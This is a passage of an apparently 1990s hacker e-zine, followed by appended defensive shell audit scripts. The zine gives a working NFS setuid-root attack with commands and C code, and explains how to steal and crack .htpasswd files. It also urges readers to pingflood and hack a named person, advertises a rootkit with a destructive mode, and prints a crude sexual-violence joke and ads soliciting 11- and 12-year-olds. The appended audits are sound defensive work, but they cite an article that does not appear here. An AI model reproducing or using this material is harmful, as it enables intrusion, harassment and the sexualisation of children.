pick the wrong tree, you could end up feeling inadequate, as well as inflicting serious physical injury upon yourself. Everyone has their own preference as to what type of tree to choose, but there are some general guidelines. The most vital factor you have to consider is the position of knotholes. If a knothole is not present, you may be forced to create your own. Any seasoned tree rapist always carries his trusty power drill. Also, be sure to measure the depth of the knothole. The texture of the bark is also important. Extremely rough bark can ruin your experience. Try to find a tree with smooth bark, such as a birch. Note that you are not limited to the part of the tree at ground level. 
Bring some climbing equipment and you can easily reach the desired level.

\|/ The Act Of Tree Raping \|/

Tree raping always has and always must be done in complete nudity. Now, remember that you were required to bring along a vat of maple syrup. This object will now come into play. First, heat it to exactly 54.7 degrees Celsius. Next lift the syrup over your head and pour it over your body. Count to 112, then lie down and roll around on the forest floor. You are now ready to begin the ritual. Approach the tree you have picked while screaming "TSAK NARP FNORZA QKWT" as loud as possible. Penetrate the tree and proceed to violate it. Try to keep moving, the maple syrup can be a powerful bonding agent. When you are finished you will have to find your own method of removing the maple syrup.

\|/ The End \|/

Avoid Pine trees AT ALL COSTS!

3. .htpasswd + .htaccess : Cain [DD]

Well, I'm back. I should have put this article out last month, but I neglected to. Flames to /dev/null. Well anyway, you know how sometimes when you connect to a web page, you are asked for a username and password? Well, here's how that works. In a directory there is a file almost always called .htpasswd. And in another directory (or possibly that same one) there is a file called .htaccess. The .htpasswd file follows basically the same format as the /etc/passwd file, one user name and one crypt(3) password hash per line:

jblow:F#.DG*m38d%RF
cain:GJA54j.3g9#$@f

and the .htaccess file follows this format (a real one also carries AuthType Basic and an AuthName realm; the require line names one or more users from the .htpasswd file):

AuthUserFile /path/to/.htpasswd
require user jblow

If there is an .htaccess file in a directory, you must have a valid username and password to view any files in that directory. So here is what happens: the httpd sees the .htaccess file in the directory that you request a file from. It finds the location of the .htpasswd file and then finds out who has access to the files in the directory. Therefore you must have a username and password. Well, here's the bug: only the files in the directory with the .htaccess file are passworded. So if the .htpasswd file is somewhere else under the document root (the top-level web directory, maybe), and the server has no rule refusing requests for it, you can fetch it with an ordinary GET. It uses the same form as /etc/passwd, so password crackers will work on it too. Insta hack if the webmaster doesn't know what he's doing. Keeping the file outside the document root, or a server rule denying any file whose name starts with .ht, closes it.

4. Simple NFS skills : Cain [DD]

You are searching around for a system to hack. One of the things you should check is whether they export any directories to everyone. Unfortunately you need a shell on the system to make use of this. But if you do, then this is an easy way to get root.

Your local system:

# showmount -e remote.com
Export list for remote.com:
/var/lib/stuff (everyone)
# mount remote.com:/var/lib/stuff /mnt
# cp hackprog /mnt
# chown root.root /mnt/hackprog
# chmod 4701 /mnt/hackprog
# umount /mnt

Their system:

$ cd /var/lib/stuff
$ hackprog
bash#

I chose the directories at random. But if you see anything like /path/to/exported/directory (everyone) in a showmount -e listing, you can mount that directory and have complete access (read, write, execute) to it. So if you put a rewting proggy:

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;
}

and make the owner root and chmod it to 4701 (setuid), then you can run that program on the system exporting that directory and get a rewt shell. Two things stop it: if the export is read-only, or the server maps root to nobody (root_squash, the default on most NFS servers), the chown to root fails on your side; and if the exporting system mounts the filesystem nosuid, the setuid bit is ignored on their side. You must also be root on your own machine to mount an NFS export; otherwise every system you got on, you could obtain a rewt shell. But oh well.

===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================

1. LOPHT.COM : so1o

get into any shell, and type...

% whois lopht.com

it's elite (lookup sIn inf0z to see)

2. AAA Report : so1o

AAA stands for Access All Areas, it is a computer security and hacking conference held in the UK in early July of every year, this would be the third year of AAA, and myself and NightRage were going.
Myself and NightRage arrived on Regent Street at 9:30am, we entered the University of Westminster building, purchased two passes for the event, and proceeded to the conference room, where there were many people aged between 16 and around 40, all with a handful of common interests, hacking, phreaking, carding and generally the ability to gain power, or "free stuff". We sat down on the ground floor near the back of the room, we got talking to a French hacker, called Leon (aka acme), we joked about "o-DaY WaReZ" and then Nightrage booted his p150 laptop, then Leon pulled out his Thinkpad, he booted it, and it counted up to 64mb of RAM, we asked how much hard drive space he had to which he casually replied "6 gig", Leon knew stuff.

The first speaker was Ross Anderson, who explained how our predecessors had broken into cash machines (ATMs) using various techniques, as well as the flaws in such machines and systems, ranging from all cards having the same PIN, to a trick that Sheffield hackers used with phone cards to get cash. He then went on to smartcards and encryption and finished around 11am.

We then went up to the network room, where the "hack the flag" competition was to be held, there were a handful of people up there, including a photographer and some staff, I only saw 3 systems and 2 terminals, not really enough to use for any competition. Leon sat down and started to toy with his laptop and some CD's he had purchased in Pakistan the day before, he had voice recognition programs and games and a few other "expensive" CD's. We met an American wearing an FBI cap, he also had a laptop, as well as another with long blonde / grayish hair who did a lot of cool stuff with the phone line in the network room using various toys he had. We needed to set up a network, we had numerous modems, one network hub with 5 ports, around 8 systems and one phone socket.
We soon realised through various methods (one using NightRage's cheap blue telephone) that the only phone socket in the room went through the reception, so NightRage phoned down to the reception, and tried to use his amazing social engineering skills.. Reception : "hello?" NightRage : "hi, is there any way I can get an outside line from this phone?" Reception : "no" NightRage : "OK" We then went on a hunt for working phone lines or hubs that we could use to help us set up our network, the FBI dude soon found a cabinet that looked important, and NightRage and the others helped him pick the lock, inside they found a 3com network hub and a few other goodies, the FBI dude got his laptop and tried to hack his way onto the network, but he couldn't use traceroute or any other programs, so that hub was useless to us unless we knew our own IP. Two younger hackers started to manually wardial the extensions, they found a handful of modem numbers in a very short amount of time. We were quite impressed by their skills. The guy with the long blond / grayish hair went down to a computer shop on Regent street to buy some RJ45 cable so we could use the hub in the cabinet, but he left before we realised that it wasn't usable. Emerson was getting really stressed out, as he was one of the staff, and he had promised the University that no damage would be done to any of the phone / computer lines, he needed a plan to stall us, even though we were telling him everything would be fine, and that we would leave all the stuff as it was when we found it, he was still scared at the consequences, and it was time for lunch, we originally planned to just pop over the street to grab a McDonalds, but Emerson started to take us down Regent street, he asked if we wanted to eat for around 5 at a place he knew well, we agreed, the time was around 1pm... 
Emerson proceeded to take myself, NightRage, the FBI dude, Wyatt and the two that had manually wardialled the extensions half way around London, we walked down Regent street, onto Tottenham court road and around a load of shops, Wyatt and the FBI dude suggested we should grab a beer, and we easily found a pub. We stopped into the pub and all ordered drinks, we then sat outside and talked about the L0phT, global positioning and scanning, we left the pub at about 2pm and made our way through a lot of roads and came to Kamamama's Japanese restaurant, after stopping into a lot of shops on the way and talking about oki phones.

We ate good Japanese food in Kamamama's, and Wyatt used his tiny scanner to detect radio comms within the building, his scanner was cool, and he tried to pinpoint the frequency that the waiters broadcast the orders with their handheld systems, at one point he placed the scanner right up next to the handheld and said "can you press that button one more time please". Wyatt also had a transceiver that he could use to broadcast on, so he could pinpoint a frequency with his scanner, and then broadcast with his tiny transceiver on that frequency.

The time was now around 3pm, and we made our way back through a very busy London to the conference, when we got back we went back up to the network room, not a lot had happened since we had been away (much as Emerson would have expected) and myself and NightRage toyed with systems for about 30 minutes. We then listened to another talk by a journalist who often writes of hacking and computer security issues, called Dave Green (I think), Cold-Fire and the people on the balcony often questioned him, and he generally said "no-one cares what you do, so why should I write about it?" which was pretty true, then another journalist went on saying that he would pay for such stories if they had reason behind them (ie. web site attacks), this was quite interesting.
The last talk myself and NightRage listened to was Alan Solomon, to which I asked, when he was talking about the Linux version of his toolkit... "Yeah, does the Linux version detect Windoze '95 as a virus?" He didn't understand, but he's cl00less and hangs on AOL all day... He then went on to talk a load of crap about how amazing AOL was, then he talked about how he has been mailbombed and how "phishers" have tried to pull all his account inf0z (passwords etc.) he was also shouting into the microphone, and I had a speaker right next to me, and I had my finger in one ear for most of the talk, due to the fact that he shouted into the microphone, he also breathed very heavily and walked around a lot.

We went back up to the network room, which now had 2 systems and 2 terminals, swapped email addresses with Wyatt, Emerson, the FBI dude and a few others, we then said our goodbyes, and left to catch the 8:30 train from Paddington Station.

AAA was cool, it was just a pity that only one of the three planned special events actually took place, as well as the fact that there really wasn't enough time for the people there to talk with each other.

3. Lamer of the fucking year : pSId (DALnet) : so1o

There's a fucking cl00less g1mp on DALnet called pSId, but then again, most people on DALnet are cl00less, this "cracker" however has the following "mad" skills...

- phf
- tftp

His most highly acclaimed hack was of sony.co.jp (guess the technique.) and since then he has blatantly lied about hacking bolero.gsfc.nasa.gov (www.nasa.gov alias) which he says runs tftp. If you see him *anywhere* feel free to pingflood his IP, 0wn his lame fuck Linux box, or anything else.

===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================

1. STiK : mstrhelix

-=STiK=-
(S)olaris (T)ool (i)diot (K)it
******************************

STiK is a deluxe rootkit for the Solaris platform containing not only tools that enable you to gain root access, it also allows you to keep it with backdoors. The Alpha version of STiK includes exploits, backdoors, sniffers, connection hijackers, a stealth mode, and eventually will also include other kewl tewls such as spoofers, other new innovative remote root access backdoors, and maybe if I have enough time an extra option to help you construct your own buffer overflow exploits.

STiK supports these platforms... sparc10 and sparc20, and it minimally supports x86 platforms. The only conflicts you may have while using this tool is if (like an (i)diot) you use the -Sun4 switch on a Solaris 5.x machine or say the -x86 switch on a -Sun5 and vice versa... but nobody is that stupid.

STiK includes the following options....

-Sun4, -Sol5, -x86 --> compiles exploits for the following platforms.
-backdrs           --> installs backdoors and suggests 'em.
-stealth           --> does whut it says... and very well.
-destruc           --> if you get caught online wreak some havoc
-man               --> shows 3r33t manpage

-Sun4     compiles loits for SunOS 4.x
-Sol5     compiles loits for Solaris 2.5.x
-x86      compiles loits for x86 platforms of solaris and sunos
-backdrs  backdoor menu feature,,, pick and choose or mix and match
-stealth  invokes programs such as cloak, zap2, block, and etc...
-destruc  if you get caught and booted this will invoke and fuck some shit up majorly. We dont wanna be destructive but hey !!!YOU FUCKING KICKED ME OFF YER MACHINE ASSHOLE I DIDN'T INVOKE THE -destruc FEATURE R00T DID!!!
-man      full featured reverse switched manpage to fuck wid yer headz

If you'z mutha fuxx0rs have any shit you would like me to add to STiK then speak now or do without cause I have been hard at work coding shit... Also anyone who wants to help port lrk3 backdoors and shit to solaris drop me a line cause its a bitch doing it all by yerself...
edge@mindwerks.com =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- .oO The CodeZero Oo. _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ::: http://insecurity.insecurity.org/codez/ ::: Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
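Added example for the test-cgi article in Section D (appended here after the zine's closing; this is editorial code, not the zine's nor NCSA's script). It reproduces the cause of the listing shown there: the script echoed $QUERY_STRING unquoted, so the shell globbed the client's input. The two functions stand in for that one line of test-cgi, the query string is passed as an argument instead of coming from the web server, and the cgi-bin directory is constructed in a temp dir; all of that is a hypothetical harness.

```shell
#!/bin/sh
# Added example (not the zine's code, not NCSA's script): why test-cgi leaks
# a directory listing.  The original script printed the query string through
# an UNQUOTED variable, so the shell applied filename expansion to it.

# The bug: $QUERY_STRING is expanded without quotes, so a "*" in the query is
# globbed against the current directory (the server's cgi-bin when the real
# script runs).  $1 stands in for the value the web server would export.
report_unquoted() {
    QUERY_STRING=$1
    echo QUERY_STRING = $QUERY_STRING
}

# The fix: quote the expansion.  A "*" now reaches the client as a literal.
report_quoted() {
    QUERY_STRING=$1
    echo "QUERY_STRING = $QUERY_STRING"
}

# Run both against a constructed cgi-bin directory so the difference is visible:
# the first line lists the three files, the second prints the literal "*".
demo() {
    dir=$(mktemp -d) || return 1
    for f in post-query test-cgi uptime; do : > "$dir/$f"; done
    ( cd "$dir" && report_unquoted '*' )
    ( cd "$dir" && report_quoted '*' )
    rm -rf "$dir"
}
```

Calling demo from a shell shows the two outputs side by side; the same unquoted expansion is what turned the /* query in the article into the root directory listing.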
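Added example for the .htpasswd + .htaccess article in Section D (appended here after the zine's closing; editorial code, not Cain's). It walks a document tree and flags every AuthUserFile that points inside the document root, which is the layout the article exploits. The document root path and the tree it scans are whatever the caller supplies; nothing here is a real site.

```shell
#!/bin/sh
# Added example (not the zine's code): audit a document tree for the exposure
# described in the .htpasswd article.  A password file referenced by an
# .htaccess but stored under the document root can be fetched with a plain
# GET unless the server refuses it (Apache's stock configuration denies names
# beginning with .ht for exactly this reason).  Paths are hypothetical.

# For every .htaccess under the document root ($1), print one line per
# AuthUserFile: EXPOSED if the password file sits under the document root,
# DANGLING if it is referenced but missing, OK if it lives outside the root.
find_exposed_htpasswd() {
    docroot=${1%/}                   # no trailing slash, so the prefix test is exact
    find "$docroot" -type f -name .htaccess | while IFS= read -r ht; do
        sed -n 's/^[[:space:]]*AuthUserFile[[:space:]]*//p' "$ht" |
        while IFS= read -r pw; do
            pw=${pw%%[[:space:]]*}   # drop anything after the path
            pw=${pw#\"}; pw=${pw%\"} # the path may be written in double quotes
            case $pw in
                "$docroot"/*)
                    if [ -f "$pw" ]; then echo "EXPOSED $pw (referenced by $ht)"
                    else                  echo "DANGLING $pw (referenced by $ht)"
                    fi ;;
                *)  echo "OK $pw (outside document root, referenced by $ht)" ;;
            esac
        done
    done
}
```

Run it as find_exposed_htpasswd /path/to/docroot; any EXPOSED line is a file a remote client can try to fetch and feed to a password cracker, and the fix is to move it outside the document root or deny .ht* files in the server configuration.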
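Added example for the NFS article in Section D (appended here after the zine's closing; editorial code, not Cain's). The trick there needs two things from the server: an export that anyone can mount, and an export that does not squash root, since with root squashing the chown to root on the client fails and the setuid bit never applies to uid 0. The functions below parse an /etc/exports-style file and saved showmount -e output for those settings. Both inputs are constructed by the caller; the host names and paths are hypothetical.

```shell
#!/bin/sh
# Added example (not the zine's code): spot the server-side settings the NFS
# trick depends on.  "*" (or "(everyone)" in Linux showmount output) means any
# client may mount the export; no_root_squash is what lets a setuid-root file
# created from the client keep uid 0 on the server.  Input files are
# constructed by the caller.

# Parse an /etc/exports-style file and print one line per client entry that is
# exported to the world or without root squashing, noting RW when writable.
# Runs in a subshell so "set -f" (no globbing of a literal "*") stays local.
audit_exports() (
    set -f
    grep -v '^[[:space:]]*#' "$1" | while read -r path clients; do
        [ -n "$path" ] || continue               # blank line
        [ -n "$clients" ] || clients='*'          # "/path" alone means everyone
        for c in $clients; do
            host=${c%%\(*}                        # client spec before "("
            case $c in
                *\(*\)) opts=${c#*\(}; opts=${opts%\)} ;;
                *)      opts= ;;
            esac
            flags=
            if [ "$host" = '*' ] || [ -z "$host" ]; then flags="$flags WORLD"; fi
            case ",$opts," in *,rw,*)             flags="$flags RW" ;; esac
            case ",$opts," in *,no_root_squash,*) flags="$flags NO_ROOT_SQUASH" ;; esac
            case $flags in
                *WORLD*|*NO_ROOT_SQUASH*) echo "$path $host:$flags" ;;
            esac
        done
    done
)

# Parse saved "showmount -e host" output and print the paths open to everyone.
world_exports_from_showmount() {
    sed '1d' "$1" | while read -r path clients; do   # skip the "Export list for" header
        case $clients in
            '(everyone)'|'*'|'') echo "$path" ;;
        esac
    done
}
```

On the server side the fix is the inverse of what the audit flags: export to named hosts only, read-only where possible, keep root_squash, and mount untrusted filesystems nosuid on any machine that will run files from them.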